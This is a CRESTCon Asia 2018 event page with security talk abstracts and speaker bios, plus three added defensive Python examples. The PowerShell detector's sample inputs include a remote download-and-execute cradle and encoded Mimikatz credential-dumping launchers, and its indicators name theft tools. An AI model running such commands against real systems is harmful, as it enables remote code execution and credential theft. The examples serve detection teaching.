CRESTCon Asia 2018
CRESTCon Asia 2018 is a unique event that brings together leading technical and business information security professionals in the industry.
DATE & TIME
Friday, 20 July 2018 / 9:00 AM to 6:00 PM
Suntec Singapore Convention & Exhibition Centre, 1 Raffles Boulevard, Room 303-304, Singapore 039593
AiSP and partner association members - S$32.10 (Cloud Security Alliance, Division Zero, Edgis, ISACA, (ISC)2, itSMF, Law Society, Null Singapore, OWASP, SCS, SGTech and others)
General Public - S$53.50
Student - S$10.70
CREST Member Companies - S$32.10 (2 complimentary tickets, please contact Vincent at c2VjcmV0YXJpYXQgfCBhaXNwICEgc2c=)
Fees are inclusive of GST. Tea break and lunch will be provided.
Advancing And Assessing Threat Hunting Programs - Teo Kia Meng
Threat Hunting serves an essential detection function within the security programs of many organisations. This talk will showcase attacks of advancing sophistication and complexity, while simultaneously outlining the principles and capabilities that Threat Hunting programs will need to possess to keep up with these attacks. The talk will conclude by showing how your organisation can visualise and assess the effectiveness of current threat hunting efforts, which is crucial in prioritising limited time and resources.
Fixing Mobile AppSec - Sven Schleier
Even though modern mobile operating systems like iOS and Android offer great APIs for secure data storage and communication, those APIs have to be used correctly in order to be effective. Data storage, inter-app communication, proper usage of cryptographic APIs and secure network communication are only some of the aspects that require careful consideration. The OWASP Mobile Security Testing Guide (MSTG) is a comprehensive manual for testing the security of mobile apps. It describes processes and techniques for verifying the requirements listed in the Mobile Application Security Verification Standard (MASVS) and provides a baseline for complete and consistent security tests.
In this talk, the final version of the MASVS and MSTG will be introduced, and we will discuss the many challenges faced during their development, from dealing with the diversity and fragmentation of the Android ecosystem to clarifying the role of software protections in mobile security.
This talk consists of 3 blocks:
Introduction of version 1.0 of the MASVS
Introduction of version 1.0 of the MSTG
Live Demo of testing data storage on iOS
1. OWASP Mobile Application Security Verification Standard (MASVS)
This first block of the talk will introduce the MASVS, which is the foundation of the Mobile Security Testing Guide project. It is a community effort to establish a framework of security requirements needed to design, develop and test secure mobile apps on iOS and Android and is meant to achieve the following:
Offer an industry standard that can be tested against in mobile app security reviews;
Provide requirements for software architects and developers seeking to develop secure mobile applications;
Provide specific recommendations as to what level of security is recommended for different use-cases.
The talk will also specifically outline the importance of security requirements during the development of mobile apps. The experience with several projects where the MASVS has been used during the SDLC will also be shared.
2. OWASP Mobile Security Testing Guide (MSTG)
The second part of the talk will introduce the MSTG. The MSTG is a comprehensive manual for testing the security of mobile apps. It describes technical processes for verifying the controls listed in the OWASP Mobile Application Security Verification Standard (MASVS). The MSTG is meant to provide a baseline set of test cases for static and dynamic security tests, and to help ensure completeness and consistency of the tests.
The goal of this project is to help people understand the what, why, when, where, and how of testing applications on Android and iOS devices. The project delivers a complete suite of test cases designed to address the Mobile Application Security Verification Standard (MASVS) and also coverage of the OWASP Mobile Top 10.
An additional attack vector in the mobile world compared to web apps is reverse engineering of mobile apps and bypassing the defences built against it. Anti-reverse-engineering defences such as obfuscation will be clarified during the talk, and the assessment methodology offered by the MSTG for them will be explained.
3. Live Demo of testing local storage on iOS
The last part of the talk will be a demo of local storage test cases that are described in the MSTG for the iOS platform. Two different scenarios will be covered:
Penetration Tester: The first demo will showcase how a penetration tester can get full access to the local storage of an app on a non-jailbroken phone. This is achieved by repackaging the IPA with the Frida gadget and using a tool called objection. This allows a penetration tester to analyse the local storage on a non-jailbroken iOS device in order to identify sensitive information such as PII.
Developer: The second demo will showcase how a developer can easily verify what kind of information the app stores in local storage. This will be demonstrated using Xcode and the iOS Simulator, which is the development environment iOS developers are already familiar with.
This will also showcase that the MSTG is not only for penetration testers but also allows developers to verify for vulnerabilities with the tools they are using.
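As an added illustration of the local-storage test cases just described (not the talk's demo code), the script below walks an app's data container and flags the leaks those tests look for: sensitive keys in the NSUserDefaults plist, PII and card numbers in SQLite tables, and tokens in cached files. The container it scans is built from constructed sample data in a temporary directory; a real run would point scan_container() at an app's data container, either from the iOS Simulator (under ~/Library/Developer/CoreSimulator/) or a copy pulled from a device with objection. The file names, key names and values are all assumptions made for the example.

```python
"""Walk an iOS app's data container and flag sensitive data in local
storage: NSUserDefaults plists, SQLite databases and plain files.

Added example for the MSTG data-storage test cases; it is not the talk's
demo code. The container it scans is built below from constructed sample
data.
"""
import os
import plistlib
import re
import sqlite3
import tempfile

# Value patterns worth reporting wherever they appear.
PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "jwt": re.compile(r"eyJ[\w-]+\.[\w-]+\.[\w-]+"),
    "card number": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}
# Key or column names that should never hold plaintext in local storage.
SENSITIVE_KEYS = re.compile(r"pass(word|wd)?|secret|token|ssn|card|cvv", re.I)

# Constructed sample values: a JWT-shaped token and a well-known test card number.
SAMPLE_JWT = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.c2lnbmF0dXJl"
SAMPLE_CARD = "4111 1111 1111 1111"


def build_sample_container(root):
    """Create a minimal app container layout with the kinds of leaks the
    MSTG tests look for (constructed data, not from any real app)."""
    prefs = os.path.join(root, "Library", "Preferences")
    docs = os.path.join(root, "Documents")
    caches = os.path.join(root, "Library", "Caches")
    for d in (prefs, docs, caches):
        os.makedirs(d, exist_ok=True)
    # NSUserDefaults ends up as a plist named after the bundle identifier.
    with open(os.path.join(prefs, "com.example.app.plist"), "wb") as f:
        plistlib.dump({"username": "alice@example.com",
                       "auth_token": SAMPLE_JWT,
                       "hasSeenOnboarding": True}, f)
    # A SQLite store created by the app (Core Data or raw sqlite3).
    con = sqlite3.connect(os.path.join(docs, "customers.db"))
    con.execute("CREATE TABLE customers (id INTEGER, name TEXT, email TEXT, card TEXT)")
    con.execute("INSERT INTO customers VALUES (1, 'Bob', 'bob@example.com', ?)", (SAMPLE_CARD,))
    con.commit()
    con.close()
    # A debug log the app wrote to its cache directory.
    with open(os.path.join(caches, "last_request.log"), "w") as f:
        f.write(f"GET /api/profile HTTP/1.1\nAuthorization: Bearer {SAMPLE_JWT}\n")
    return root


def _flatten(obj, prefix=""):
    """Yield (dotted key path, string value) pairs from nested plist data."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from _flatten(val, f"{prefix}{key}.")
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            yield from _flatten(val, f"{prefix}{i}.")
    elif isinstance(obj, str):
        yield prefix.rstrip("."), obj


def _is_sqlite(path):
    with open(path, "rb") as f:
        return f.read(16) == b"SQLite format 3\x00"


def iter_strings(path):
    """Yield (locator, text) pairs from a plist, a SQLite database or any other file."""
    if path.endswith(".plist"):
        with open(path, "rb") as f:
            yield from _flatten(plistlib.load(f))
    elif _is_sqlite(path):
        con = sqlite3.connect(path)
        tables = [t for (t,) in con.execute("SELECT name FROM sqlite_master WHERE type='table'")]
        for table in tables:
            cols = [c[1] for c in con.execute(f'PRAGMA table_info("{table}")')]
            for row in con.execute(f'SELECT * FROM "{table}"'):
                for col, val in zip(cols, row):
                    if isinstance(val, str):
                        yield f"{table}.{col}", val
        con.close()
    else:
        with open(path, "rb") as f:
            yield "content", f.read().decode("utf-8", "ignore")


def scan_container(root):
    """Return sorted (relative path, finding, matched text) tuples for the container."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            for locator, text in iter_strings(path):
                if SENSITIVE_KEYS.search(locator):
                    findings.append((rel, f"sensitive key '{locator}'", text[:12] + "..."))
                for label, rx in PATTERNS.items():
                    for m in rx.finditer(text):
                        findings.append((rel, label, m.group(0)))
    return sorted(findings)


def run_demo():
    """Build the sample container in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_container(build_sample_container(tmp))


if __name__ == "__main__":
    for finding in run_demo():
        print(*finding, sep="  ")
```

The same scanner works on a container copied off a device: objection's file download commands and Xcode's simulator directory both give you the raw Documents, Library/Preferences and Library/Caches trees, which is where most of the MSTG data-storage findings sit. Anything it reports in a plist or unencrypted SQLite file should be in the Keychain or not stored at all.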
Supercharge Your Web Recon With Commonspeak and Evolutionary Wordlists - Michael Gianarakis & Shubham Shah
When conducting a web application penetration test, understanding and extending the attack surface is critical for success. Having a large wordlist of realistic directories, files and domains assists immensely with this process. Commonspeak is a wordlist generation tool that leverages public datasets from Google's BigQuery platform. By performing queries on large datasets that are updated frequently, Commonspeak is able to generate wordlists that are "evolutionary", in the sense that they reflect the newest trends on the internet.
This presentation will discuss the concept of evolutionary wordlists and how Commonspeak parses URLs from various BigQuery datasets including HTTPArchive, Stack Overflow and HackerNews to build current, consistently evolving and realistic wordlists of directories, files, parameter names for specific technologies, and subdomains. We will also introduce Commonspeak 2 and discuss the additions to the tool including scheduled wordlist creation, comprehensive GitHub queries, a permutation engine for subdomain discovery and asynchronous wordlist generation.
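As an added illustration of the idea behind Commonspeak (this is not the tool's own code), the script below does the part that happens after the BigQuery export: each observed URL is split into subdomain labels, directories, a file name and parameter names, the pieces are counted so the most common entries float to the top, and observed subdomain labels are recombined with common affixes in the way a permutation engine would. The URLs, the affix list and the "last two labels are the registrable domain" rule are assumptions made for the example.

```python
"""Turn a set of observed URLs into directory, file, parameter and
subdomain wordlists, plus a small subdomain permutation engine.

Added illustration of the idea behind Commonspeak; this is not the tool's
own code, and the URLs below are a constructed sample standing in for
rows exported from a BigQuery dataset such as HTTPArchive.
"""
import itertools
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample input (not real dataset rows).
SAMPLE_URLS = [
    "https://www.example.com/wp-content/uploads/2018/07/report.pdf",
    "https://api.example.com/v2/users/list?page=2&sort=name",
    "https://dev.example.com/admin/login.php?redirect=/dashboard",
    "https://www.example.com/wp-admin/admin-ajax.php?action=search",
    "https://staging-api.example.com/v2/health",
    "https://www.example.com/assets/js/app.min.js?v=1.2.3",
    "https://blog.example.org/2018/07/hello-world/",
]


def is_noise(segment):
    """Path segments that are pure numbers (years, ids) make poor guesses."""
    return segment.isdigit()


def split_url(url):
    """Return (subdomain_labels, directories, filename, parameter_names)."""
    parts = urlsplit(url)
    labels = (parts.hostname or "").split(".")
    # Assumption: the registrable domain is the last two labels
    # (no multi-part public suffixes such as co.uk in the sample).
    subdomains = labels[:-2]
    segments = [s for s in parts.path.split("/") if s]
    filename = None
    if segments and "." in segments[-1] and not parts.path.endswith("/"):
        filename = segments.pop()
    directories = [s for s in segments if not is_noise(s)]
    params = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return subdomains, directories, filename, params


def build_wordlists(urls):
    """Count every directory, file, parameter name and subdomain label.

    The counts are what makes the list 'evolutionary': re-running over a
    fresh dataset reorders the entries by how common they are now.
    """
    lists = {key: Counter() for key in
             ("directories", "files", "parameters", "subdomains")}
    for url in urls:
        subs, dirs, fname, params = split_url(url)
        lists["subdomains"].update(subs)
        lists["directories"].update(dirs)
        if fname:
            lists["files"][fname] += 1
        lists["parameters"].update(params)
    return lists


def permute_subdomains(labels, domain="example.com",
                       affixes=("dev", "staging", "api", "admin")):
    """Recombine observed subdomain labels with common affixes.

    'staging-api' is split into 'staging' and 'api' so that each part can
    be paired with every affix in three common joining styles.
    """
    words = set()
    for label in labels:
        words.update(label.split("-"))
    words.discard("www")
    candidates = set()
    for word, affix in itertools.product(sorted(words), affixes):
        if word == affix:
            continue
        candidates.update({f"{affix}-{word}", f"{word}-{affix}", f"{affix}.{word}"})
    return sorted(f"{c}.{domain}" for c in candidates)


if __name__ == "__main__":
    lists = build_wordlists(SAMPLE_URLS)
    for name, counter in lists.items():
        print(name, counter.most_common(5))
    print(permute_subdomains(lists["subdomains"])[:10])
```

Feeding this a few million URLs instead of seven is the whole trick: the noise filter and the counts matter far more at that scale, and the permutation output is what you would hand to a DNS brute-forcer rather than a directory scanner.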
Approaching Red Teaming with a 'Militant Mindset' - Matt Lorentzen
The concept of Red Teaming is to emulate committed attackers with a goal in mind. This goal may be to gain access to sensitive data, influence financial processes, gain access to intellectual property, or damage company assets and reputation.
This then poses the question of how to successfully emulate these attackers and how to adopt an organised, attacking mindset. This talk will present some concepts that underpin successful Red Teaming engagements, focusing on the following key areas:
Designing flexible attacking infrastructure
Attack strategy and orchestration
PowerShell: From Attackers' to Defenders' Perspective - Elliott Neo & Crystal Tan
McAfee Labs saw PowerShell malware grow by 267% in the fourth quarter of 2017, and by 432% year over year. The malicious behaviour associated with PowerShell attacks can range from lateral movement to credential theft, privilege escalation, data exfiltration, establishing persistence, system disruption and command-and-control activity. The rise of fileless malware using PowerShell makes detection even more difficult. Moreover, PowerShell can be easily obfuscated and cannot be reliably detected with static signatures and file hashes. To make matters worse, many targeted attack groups already use PowerShell in their attack chain as a downloader and for lateral movement.
In this talk, we will discuss recent PowerShell trends and attacks and the various tools and techniques that can be used to detect malicious PowerShell scripts. In addition, we will highlight the PowerShell built-in logs and the potential mitigations to counter these attacks.
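As an added example of the detection side of the talk (not code from the speakers), the script below scores PowerShell script blocks of the kind Script Block Logging writes to the Microsoft-Windows-PowerShell/Operational log as Event ID 4104. It looks for download cradles, the usual launcher switches, command names assembled from string pieces, and base64 payloads, and it decodes any -EncodedCommand argument or long base64 literal and rescans the decoded text, which is what defeats the "hide Invoke-Mimikatz in base64" trick that static signatures on the outer script miss. The four sample script blocks are constructed, and the indicator list and weights are assumptions for the example rather than a published rule set.

```python
"""Score PowerShell script blocks, as recorded by Script Block Logging
(Microsoft-Windows-PowerShell/Operational, Event ID 4104), for download
cradles, obfuscation and encoded payloads.

Added detection example, not code from the talk. The four ScriptBlockText
values below are constructed samples, and the indicator list and weights
are assumptions rather than a published rule set.
"""
import base64
import binascii
import re

# Constructed sample ScriptBlockText values keyed by a short name.
SAMPLE_BLOCKS = {
    "admin_backup": "Get-ChildItem C:\\Logs -Recurse | Where-Object LastWriteTime -lt "
                    "(Get-Date).AddDays(-30) | Remove-Item",
    "downloader": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')",
    # 'SW52b2tlLU1pbWlrYXR6' is base64 for Invoke-Mimikatz; the IEX name is built from pieces.
    "obfuscated": "&('I'+'EX') ([Text.Encoding]::ASCII.GetString("
                  "[Convert]::FromBase64String('SW52b2tlLU1pbWlrYXR6')))",
    # -EncodedCommand takes base64 of the UTF-16LE script text.
    "encoded": "powershell.exe -nop -w hidden -EncodedCommand "
               + base64.b64encode("Invoke-Mimikatz -DumpCreds".encode("utf-16-le")).decode(),
}

# (regex, weight, label); matched case-insensitively because PowerShell is.
INDICATORS = [
    (r"\b(IEX|Invoke-Expression)\b", 3, "invoke-expression"),
    (r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", 3, "download cradle"),
    (r"FromBase64String", 2, "base64 decode"),
    (r"-(nop|noprofile)\b", 1, "noprofile"),
    (r"-w(indowstyle)?\s+hidden", 2, "hidden window"),
    (r"Invoke-Mimikatz|DumpCreds|sekurlsa", 5, "credential theft tool"),
    (r"\('[A-Za-z]+'\+'[A-Za-z]+'\)", 3, "command name built by concatenation"),
    (r"\[char\]\d+", 2, "char-code construction"),
    (r"\w`\w", 2, "backtick-split token"),
]


def _decode_base64(blob):
    """Decode a base64 string; as UTF-16LE if every high byte is zero, else Latin-1."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def decode_embedded(text):
    """Return payloads hidden in the block: the -EncodedCommand argument
    (any unambiguous -e... prefix is accepted) and long quoted base64 literals."""
    blobs = re.findall(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", text, re.I)
    blobs += re.findall(r"['\"]([A-Za-z0-9+/=]{16,})['\"]", text)
    return [d for d in (_decode_base64(b) for b in blobs) if d]


def score_block(text):
    """Return (score, reasons) for one ScriptBlockText, rescanning decoded layers."""
    score, reasons = 0, []
    layers = [text] + decode_embedded(text)
    if len(layers) > 1:
        score += 2
        reasons.append("embedded base64 payload")
    for depth, layer in enumerate(layers):
        for pattern, weight, label in INDICATORS:
            if re.search(pattern, layer, re.I):
                score += weight
                reasons.append(label if depth == 0 else f"{label} (in decoded layer)")
    return score, reasons


def triage(blocks, threshold=5):
    """Names of blocks whose score reaches the threshold, highest score first."""
    scored = sorted(((score_block(t)[0], name) for name, t in blocks.items()), reverse=True)
    return [name for score, name in scored if score >= threshold]


if __name__ == "__main__":
    for name, text in SAMPLE_BLOCKS.items():
        print(name, *score_block(text))
    print("flagged:", triage(SAMPLE_BLOCKS))
```

The benign administrative block scores zero, the plain download cradle is caught on its face, and the two disguised blocks are caught only because the decoded layer is rescanned; that second pass is the part worth keeping when you port the idea to your SIEM, since Script Block Logging records the de-obfuscated code PowerShell actually executes for each nested invocation anyway.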
iOS Runtime Hacking Crash Course - Michael Gianarakis & Shubham Shah
Over the past few years there have been a number of significant changes and trends in the iOS ecosystem that have complicated reverse engineering and exploiting iOS applications for penetration testing purposes. The introduction of Swift, the move to 64-bit only and the rise of cross-platform frameworks such as Xamarin, Cordova and React Native have affected the techniques and tools traditionally used for these tasks. This talk will provide a crash course in exploiting iOS applications through manipulation of the application runtime. The aim is to provide practical examples of how to observe and manipulate the inner workings of applications on iOS to defeat security protections including jailbreak prevention, anti-debugging and certificate pinning, obtain credentials and other sensitive information, and subvert business logic.
Config Password Encryption Gone Wrong - Keith Lee
Sometimes, penetration tests get tougher after an organisation has undergone several tests by different testers over a couple of years. Getting Domain Admin access becomes especially difficult as the organisation gets better at securing its systems and source code.
For example, in the first year of penetration testing, a penetration tester might get lucky and find clear-text credentials in configuration files on a system, which can be used to move laterally and vertically through the network.
Things might get tougher after that, as organisations could start adding encryption to the passwords in configuration files, making some penetration testers turn away and look for other low-hanging fruit in order to move laterally and vertically through the network.
However, sometimes the encryption is poorly implemented, can be defeated easily, and results in an instant win for the penetration tester.
In this presentation, we discuss a real-life case where I was able to get into a system but the passwords in the configuration files for the Tomcat servlets were encrypted. However, the encryption wasn't implemented properly, and I was able to decrypt the passwords and ultimately compromise the entire network. We will also discuss some tips and tricks on how to identify whether a Tomcat server is using this encryption library/tool, where to find the key and how to decrypt the passwords.
The main takeaway is that penetration testers should not give up immediately if they find encrypted passwords in configuration files.
Crystal Tan - The Ultimate Software Group of Asia Pte Ltd
Crystal Tan is a Security Analyst at a US-based cloud technology company. She holds a Bachelor's degree in Computer Science specialising in Digital Systems Security and has done research on mitigations against PowerShell attacks. She has experience in cyber crime investigation, including phishing, fraud and embezzlement cases.
Elliott Neo - The Ultimate Software Group of Asia Pte Ltd
Elliott Neo is a seasoned security practitioner who has a keen interest in cyber security and forensics and holds a degree in cyber forensics. In his current role as Senior Security Analyst at a US-based cloud technology company, he is involved in security operations, which includes incident response and threat monitoring. His research interests include cyberattacks related to PowerShell and developing detections for cyber threats.
Keith Lee - Trustwave SpiderLabs
Keith Lee is a Senior Security Consultant with Trustwave's SpiderLabs Asia-Pacific. SpiderLabs has a focus on security research. Keith regularly presents at security conferences worldwide, such as DEF CON, Thotcon, HITB, Rootcon, Zeronights and PHDays.
Matthew Lorentzen - Trustwave SpiderLabs
Matt has 20 years IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements. Before joining SpiderLabs, he worked with Hewlett Packard Enterprise as a CHECK Team Leader delivering penetration testing services to a global client list. Prior to HPE, Matt ran his own IT consultancy company for 7 years.
Michael Gianarakis is the CEO of Assetnote, a platform for continuous monitoring of your external attack surface. Michael has presented research at various industry events and meetups including DEF CON, Black Hat Asia, BSides Las Vegas, Thotcon, Rootcon, and Hack in the Box. Michael is also actively involved in the local security community in Australia, where he is one of the organisers of the monthly SecTalks meetup as well as the hacker camp TuskCon.
Shubham Shah is the CTO of Assetnote, a platform for continuous monitoring of your external attack surface. Shubham is a prolific bug bounty hunter in the top 50 hackers on HackerOne and has presented at various industry events including QCon London, Kiwicon, BSides Canberra and WAHCKon. Shubham is also a founder of the charity Hackers Helping Hackers which provides hackers from under-represented and less privileged groups access to industry events, mentorship and training.
Sven Schleier - Vantage Point Security Pte Ltd
Sven is an experienced web and mobile penetration tester who has assessed everything from historic Flash applications to progressive mobile apps. He is also a security engineer who has supported many projects end-to-end during the SDLC to "build security in". He has spoken at local and international meetups and conferences and conducts hands-on workshops about web application and mobile app security.
Teo Kia Meng - MWR InfoSecurity
Teo Kia Meng is a Threat Hunter (Detection and Response Team) at Countercept, a 24/7 managed threat hunting service by MWR InfoSecurity. He enjoys detecting and dealing with the wide range of threats seen at work. His interests include all things blue-team, and submitting CTF flags.